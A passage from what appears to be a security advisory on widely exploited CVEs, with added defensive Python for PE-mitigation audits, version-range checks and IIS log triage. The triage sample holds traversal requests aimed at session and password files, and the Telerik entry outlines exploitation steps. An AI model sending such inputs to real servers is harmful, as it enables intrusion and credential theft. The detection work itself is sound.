**Microsoft Exchange Memory Corruption (CVE-2020-0688)**

_**Vulnerability Description**_
An RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.

_**CVSS 3.0**_: High

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_
CVE-2020-0688 exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install.
_A nation-state APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)

_**Recommended Mitigations**_

 * Download and install a fixed software version of the software from a vendor-approved resource.

_**Detection Methods**_

 * Manually check your software version to see if it is susceptible to this vulnerability.
 * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

Microsoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable.

_**References**_

 * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)
 * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)
 * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)
 * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)
 * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)
 * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)

_Table 8: CVE-2019-3396 Vulnerability Details_

**Atlassian Confluence Server and Data Center Widget Connector Server-Side Template Injection (CVE-2019-3396)**

_**Vulnerability Description**_

Atlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Confluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.

_Multiple malware campaigns have taken advantage of this vulnerability, the most notable being GandCrab ransomware._

_**Fix**_

[Patch Available](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)

_**Recommended Mitigations**_

 * Download and install a fixed software version of the software from a vendor-approved resource.

_**Detection Methods**_

 * Manually check the software version to see if it is susceptible to this vulnerability.
 * CVE-2019-3396 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at [https://github.com/nsacyber/Mitigating-Web-Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>).

_**Vulnerable Technologies and Versions**_

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)
 * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)
 * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)
 * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)
 * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>)

_Table 9: CVE-2017-11882 Vulnerability Details_

**Microsoft Office Memory Corruption (CVE-2017-11882)**

_**Vulnerability Description**_

Microsoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the "Microsoft Office Memory Corruption Vulnerability."

Cyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phishing campaigns, and it enables RCE on vulnerable systems.

_**CVSS 3.0**_

High

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Microsoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.

Data execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute embedded attacker commands.

_Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)

_**Recommended Mitigations**_

 * To remediate this issue, administrators should deploy Microsoft’s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.
 * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>).

_**Detection Methods**_

 * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability.

_**Vulnerable Technologies and Versions**_

 * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable.
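Table 9 attributes part of CVE-2017-11882's exploitability to the way `eqnedt32.exe` was linked: it did not opt in to DEP or ASLR, and it carries a link timestamp from 2000. Both facts live in the PE optional header (the `DllCharacteristics` flags and the COFF `TimeDateStamp`), so an administrator can audit any executable for the same weakness. The Python below is an added illustration, not part of the advisory; it parses those header fields and reports the verdict. The images it inspects are synthetic, header-only PE files constructed inline (they are not Microsoft's Equation Editor binary), so the verdict for a real file depends on that file's own header.

```python
import struct
from datetime import datetime, timezone
from typing import Dict

# DllCharacteristics flags from the PE/COFF specification.
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000

MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}


def parse_pe_mitigations(data: bytes) -> Dict[str, object]:
    """Return link-time exploit-mitigation opt-ins recorded in a PE image header.

    Only the DOS header, PE signature, COFF header and the start of the optional
    header are read, so the first few hundred bytes of the file are enough.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, _, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    if opt_size < 72:
        raise ValueError("optional header too short to carry DllCharacteristics")
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both PE32 (0x10B) and PE32+ (0x20B).
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "machine": MACHINE_NAMES.get(machine, f"{machine:#x}"),
        "pe32plus": magic == 0x20B,
        "link_time": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "dll_characteristics": dll_chars,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "cfg": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def mitigation_report(name: str, data: bytes) -> str:
    """One-line verdict in the style of a host audit finding."""
    info = parse_pe_mitigations(data)
    missing = [m for m, ok in (("ASLR", info["aslr"]), ("DEP", info["dep"])) if not ok]
    verdict = "opts in to ASLR and DEP" if not missing else "does NOT opt in to " + " or ".join(missing)
    return f"{name}: {info['machine']}, linked {info['link_time']:%Y-%m-%d}, {verdict}"


def build_sample_pe(dll_characteristics: int, year: int, month: int, day: int) -> bytes:
    """Construct a minimal, header-only PE32 image for demonstration.

    This is a synthetic sample (no sections, no code), not a real Microsoft binary.
    """
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature follows the DOS header
    ts = int(datetime(year, month, day, tzinfo=timezone.utc).timestamp())
    coff = struct.pack("<HHIIIHH", 0x14C, 0, ts, 0, 0, 224, 0x0102)  # i386, PE32 optional header size
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed samples: a "legacy" image linked like the one Table 9 describes
# (no ASLR/DEP opt-in, year-2000 link date) and a hardened one for contrast.
LEGACY_SAMPLE = build_sample_pe(0, 2000, 11, 9)
HARDENED_SAMPLE = build_sample_pe(
    IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT, 2021, 1, 1)

if __name__ == "__main__":
    print(mitigation_report("legacy-sample.exe", LEGACY_SAMPLE))
    print(mitigation_report("hardened-sample.exe", HARDENED_SAMPLE))
```

To audit a real file, read its first 1 KiB with `open(path, "rb").read(1024)` and pass the bytes to `mitigation_report`. A binary that reports "does NOT opt in" only gains DEP or ASLR protection if the policy is forced system-wide, which is the same caveat Table 9 makes for `eqnedt32.exe`.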
_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)
 * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)
 * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)
 * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>)

_Table 10: CVE-2019-11580 Vulnerability Details_

**Atlassian Crowd and Crowd Data Center Remote Code Execution (CVE-2019-11580)**

_**Vulnerability Description**_

Atlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.

_**Fix**_

[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>)

_**Recommended Mitigations**_

 * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.
 * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.
 * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>.
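The detection method that recurs through these tables is "manually check your software version". Version strings compare badly as text ("6.12.3" sorts before "6.7.0"), so an inventory check needs a numeric comparison against each table's affected ranges, and it has to respect whether a range bound is inclusive (FortiOS "6.0.0 to 6.0.4") or exclusive ("before 6.12.3"). The Python below is an added example, not part of the advisory; it encodes the ranges quoted in Table 4 (FortiOS), Table 8 (Confluence) and Table 11 (Drupal core) and runs them over a constructed inventory. The host names and versions in `SAMPLE_INVENTORY` are made up for the demonstration; the product keys are labels chosen here, not vendor identifiers.

```python
import re
from typing import Dict, Iterable, List, Tuple

Version = Tuple[int, ...]
# (lowest affected, upper bound, upper bound inclusive?)
Range = Tuple[str, str, bool]


def parse_version(text: str) -> Version:
    """Turn '6.12.3' or '5.4.12' into a tuple of ints so it compares numerically."""
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple(int(p) for p in parts)


def _pad(v: Version, n: int) -> Version:
    """Right-pad with zeros so '6.6' and '6.6.12' compare component by component."""
    return v + (0,) * (n - len(v))


def in_range(version: str, low: str, high: str, high_inclusive: bool) -> bool:
    """True when low <= version < high (or <= high when the bound is inclusive)."""
    v, lo, hi = parse_version(version), parse_version(low), parse_version(high)
    n = max(len(v), len(lo), len(hi))
    v, lo, hi = _pad(v, n), _pad(lo, n), _pad(hi, n)
    return lo <= v and (v <= hi if high_inclusive else v < hi)


# Affected ranges exactly as stated in the advisory's tables.
AFFECTED: Dict[str, List[Range]] = {
    # Table 4: FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 (inclusive)
    "FortiOS (CVE-2018-13379)": [
        ("6.0.0", "6.0.4", True), ("5.6.3", "5.6.7", True), ("5.4.6", "5.4.12", True)],
    # Table 8: all versions before 6.6.12; 6.7.0 before 6.12.3; 6.13.0 before 6.13.3;
    # 6.14.0 before 6.14.2 (each upper bound is the fixed version, so exclusive)
    "Confluence (CVE-2019-3396)": [
        ("0", "6.6.12", False), ("6.7.0", "6.12.3", False),
        ("6.13.0", "6.13.3", False), ("6.14.0", "6.14.2", False)],
    # Table 11: before 7.58; 8.x before 8.3.9; 8.4.x before 8.4.6; 8.5.x before 8.5.1
    "Drupal core (CVE-2018-7600)": [
        ("7.0", "7.58", False), ("8.0", "8.3.9", False),
        ("8.4.0", "8.4.6", False), ("8.5.0", "8.5.1", False)],
}


def is_affected(product: str, version: str) -> bool:
    """True if the installed version falls in any affected range for the product."""
    return any(in_range(version, lo, hi, inc) for lo, hi, inc in AFFECTED[product])


def affected_hosts(inventory: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Filter (host, product, version) triples down to the ones still exposed."""
    return [(h, p, v) for h, p, v in inventory if is_affected(p, v)]


# Constructed inventory for the demonstration; not real hosts or data.
SAMPLE_INVENTORY = [
    ("vpn-edge-1", "FortiOS (CVE-2018-13379)", "6.0.4"),    # last affected build, inclusive bound
    ("vpn-edge-2", "FortiOS (CVE-2018-13379)", "6.0.5"),    # first fixed build
    ("wiki-1", "Confluence (CVE-2019-3396)", "6.12.2"),     # one below the 6.12.x fix
    ("wiki-2", "Confluence (CVE-2019-3396)", "7.4.0"),
    ("www-1", "Drupal core (CVE-2018-7600)", "8.5.0"),
    ("www-2", "Drupal core (CVE-2018-7600)", "7.58"),       # exactly the fixed version
]

if __name__ == "__main__":
    for host, product, version in affected_hosts(SAMPLE_INVENTORY):
        print(f"{host}: {product} {version} is in an affected range")
```

The same table drives both directions of the check: a host on exactly the fixed version (`7.58`, `6.0.5`) is reported clean, while a host on the last vulnerable build of an inclusive range (`6.0.4`) is still flagged. Ranges for the other tables can be added to `AFFECTED` in the same shape.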
_**Detection Methods**_

 * Manually check your software version to see if it is susceptible to this vulnerability.
 * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>.

_**Vulnerable Technologies and Versions**_

All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

_**References**_

 * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)
 * [Crowd CWD-5388: Crowd – pdkinstall Development Plugin Incorrectly Enabled – CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)
 * [Crowd Security Advisory: Crowd Data Center and Server 4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>)

_Table 11: CVE-2018-7600 Vulnerability Details_

**Drupal Core Multiple Remote Code Execution (CVE-2018-7600)**

_**Vulnerability Description**_

Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

An RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.

_Malware campaigns include the Muhstik botnet and XMRig Monero cryptocurrency mining._

_**Fix**_

[Patch Available](<https://www.drupal.org/sa-core-2018-002>)

_**Recommended Mitigations**_

 * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1.

_**Detection Methods**_

 * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: [https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py](<https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>).

_**Vulnerable Technologies and Versions**_

 * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected.

_**References**_

 * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)
 * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)
 * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)

_Table 12: CVE-2019-18935 Vulnerability Details_

**Telerik UI for ASP.NET AJAX Insecure Deserialization (CVE-2019-18935)**

_**Vulnerability Description**_

Telerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content.
Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

The Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which does not properly sanitize the serialized data during the deserialization process. This issue is attacked by:

 1. Determining the vulnerable function is available/registered: `http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,
 2. Determining if the version running is vulnerable by querying the UI, and
 3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via the `rauPostData` parameter along with the proper encryption key.

_There were two malware campaigns associated with this vulnerability:_

 * _Netwalker Ransomware and_
 * _Blue Mockbird Monero Cryptocurrency-mining._

_**Fix**_

[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)

_**Recommended Mitigations**_

 * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later).

_**Detection Methods**_

 * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.
 * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log.
Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).
 * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>).

_**Vulnerable Technologies and Versions**_

Telerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected.

_**References**_

 * [Telerik UI for ASP.NET AJAX security advisory – Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)
 * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)
 * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)
 * [Bishop Fox – CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)
 * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)

_Table 13: CVE-2019-0604 Vulnerability Details_

**Microsoft SharePoint Remote Code Execution (CVE-2019-0604)**

_**Vulnerability Description**_

A vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.

_**CVSS 3.0**_

Critical

_**Vulnerability Discussion, IOCs, and Malware Campaigns**_

This vulnerability was typically exploited to install web shell malware on vulnerable hosts. A web shell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:

`C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\<version_number>\Template\Layouts`

The `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEntity/ValidateEntity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaluated for relevant XML commands and strings. A user can attack .NET based XML parsers with XMLNS payloads using the `<system:string>` tag and embedding malicious operating system commands.

_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._

_**Fix**_

[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)

_**Recommended Mitigations**_

 * Upgrade on-premises installations of Microsoft SharePoint to the latest available version (Microsoft SharePoint 2019) and patch level.
 * On-premises Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible.
_**Detection Methods**_

 * The patch level of on-premises Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.
 * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.
 * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>).

_**Vulnerable Technologies and Versions**_

At the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft SharePoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2.
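Tables 12 and 13 both point defenders at IIS HTTP request logs, and Table 4 asks for detection of traversal attempts against `sslvpn_websessions`. All three reduce to rules over a request's method, path and query, so one log triage routine can carry them. The Python below is an added example, not part of the advisory or of the ACSC advisories it cites; it parses the IIS W3C extended format (the `#Fields:` header names the columns), URL-decodes paths before matching so encoded traversal is not missed, and flags requests that match the request-level patterns the tables describe: traversal sequences (with a stronger finding when the target is `sslvpn_websessions`), requests to the Telerik `Telerik.Web.UI.WebResource.axd?type=rau` handler, and POSTs to SharePoint's `picker.aspx`. The log lines are constructed for the demonstration, with documentation-range addresses, and are not real traffic; the finding labels are names chosen here.

```python
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import unquote

# Constructed sample in IIS W3C extended log format; not real log data.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-03-01 10:00:01 203.0.113.5 GET /remote/page lang=../../../sslvpn_websessions 200
2021-03-01 10:00:02 203.0.113.5 GET /index.html - 200
2021-03-01 10:00:03 198.51.100.7 GET /Telerik.Web.UI.WebResource.axd type=rau 200
2021-03-01 10:00:04 198.51.100.7 POST /Telerik.Web.UI.WebResource.axd type=rau 200
2021-03-01 10:00:05 192.0.2.9 POST /_layouts/15/picker.aspx - 200
2021-03-01 10:00:06 192.0.2.9 GET /_layouts/15/picker.aspx - 200
2021-03-01 10:00:07 203.0.113.5 GET /images/%2e%2e/%2e%2e/etc/passwd - 404
"""

TRAVERSAL = re.compile(r"\.\.(?:/|$)")


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in the #Fields: directive."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other directives and blank lines
        else:
            yield dict(zip(fields, line.split()))


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (double encoding is common) and normalise backslashes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the finding labels that apply to one request (empty list if none)."""
    method = entry.get("cs-method", "").upper()
    stem = fully_decode(entry.get("cs-uri-stem", ""))
    query = fully_decode(entry.get("cs-uri-query", "-"))
    target = stem + ("?" + query if query != "-" else "")
    findings: List[str] = []

    # Table 4: directory traversal, especially toward the session file.
    if TRAVERSAL.search(target):
        if "sslvpn_websessions" in target:
            findings.append("traversal to sslvpn_websessions (CVE-2018-13379 pattern)")
        else:
            findings.append("generic path traversal attempt")

    # Table 12: probing or using the Telerik async upload handler.
    if stem.lower().endswith("/telerik.web.ui.webresource.axd") and "type=rau" in query.lower():
        findings.append(f"{method} to Telerik AsyncUploadHandler endpoint (CVE-2019-18935 precursor)")

    # Table 13: the deserialization sink is reached through picker.aspx POSTs.
    if stem.lower().endswith("/picker.aspx") and method == "POST":
        findings.append("POST to SharePoint picker.aspx (CVE-2019-0604 vector)")

    return findings


def triage(log_text: str) -> List[Tuple[str, str, str, List[str]]]:
    """Run every rule over a log and keep only requests with at least one finding."""
    hits = []
    for entry in parse_w3c(log_text):
        findings = classify(entry)
        if findings:
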